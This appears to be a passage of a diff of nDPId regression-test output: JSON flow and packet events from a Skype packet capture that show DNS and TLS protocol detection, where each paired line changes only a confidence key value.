00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1431969642337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969642337,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+EyEAAEAR5BrAqAEiwKgBAf4VADUAKsDYd8YBAAABAAAAAAAABGRzbjQBZAVza3lwZQNuZXQAABwAAQ=="} 
-00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1431969642376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969642376,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1+lUAQEJvL9OBgAABAAEAAAAABWU3NzY4AWIKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAQABBffSSI="} -00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.223.73.34"}} +00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"e7768.b.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.223.73.34"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642376,"flow_last_seen":1431969642376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431969642376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw0tAAEAGVKHAqAEiF99JIsNrAbvkkjeSAAAAALAC\/\/9pYAAAAgQFtAEDAwUBAQgKPiKLYwAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431969642398,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969642398,"pkt":"0NQSxnP1PBXCt3IOCABFAABKxdsAAEARMVTAqAEiwKgBAcNGADUANrH\/diQBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAAAEAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1431969642398,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969642398,"pkt":"0NQSxnP1PBXCt3IOCABFAABKPqUAAEARuIrAqAEiwKgBAd\/IADUANro4UU4BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAABwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1431969642400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1431969642400,"pkt":"PBXCt3IO0NQSxnP1CABFAACYAABAAEARtuHAqAEBwKgBIgA15TkAhAy4SPGBgAABAAAAAQAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAHALQAGAAEAAArBADUDbnMxBG1zZnQDbmV0AAZtc25oc3QJbWljcm9zb2Z0wDJ4Gz7uAAAcIAAAA4QAJOoAAAAOEA=="} 
-00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969642400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969642400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1431969642433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642433,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGIPEX30kiwKgBIgG7w2sxgMP95JI3k6ASOJD6qQAAAgQFrAQCCAr301nQPiKLYwEDAwU="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1431969642434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642434,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0zNJAAEAGSybAqAEiF99JIsNrAbvkkjeTMYDD\/oAQECxRlwAAAQEICj4ii5z301nQ"} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642376,"flow_last_seen":1431969642434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969642434,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skypeassets.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642376,"flow_last_seen":1431969642434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969642434,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skypeassets.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642444,"flow_last_seen":1431969642444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642444,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431969642444,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642444,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1ldAAEAGhorAqAEinTh+08NsAbvs\/oHsAAAAALAC\/\/9bSwAAAgQFtAEDAwUBAQgKPiKLpgAAAAAEAgAA"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431969642469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642469,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYZlBN98hwKgBIpxCw2oyvdjRgJS+lKASOJDQnQAAAgQFrAQCCApNl5tJPiKLPAEDAwk="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1431969642469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642469,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MzFAAEAGJXDAqAEiQTffIcNqnEKAlL6UMr3Y0oAQECwnRgAAAQEICj4ii75Nl5tJ"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431969642519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969642519,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4WGRAAHYGzoWdOH7TwKgBIgG7w2wloWLk7P6B7ZASIACkPAAAAgQFrAQCCAoZLBplPiKLpg=="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1431969642519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642519,"pkt":"0NQSxnP1PBXCt3IOCABFAAA00kpAAEAGiqPAqAEinTh+08NsAbvs\/oHtJaFi5YAQ\/\/\/eqAAAAQEICj4ii\/AZLBpl"} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642444,"flow_last_seen":1431969642548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969642548,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01393{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642444,"flow_last_seen":1431969642708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431969642708,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642444,"flow_last_seen":1431969642548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969642548,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01393{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642444,"flow_last_seen":1431969642708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431969642708,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1431969642969,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969642969,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6a7MAAEARi4zAqAEiwKgBAcLvADUAJlJY1+QBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
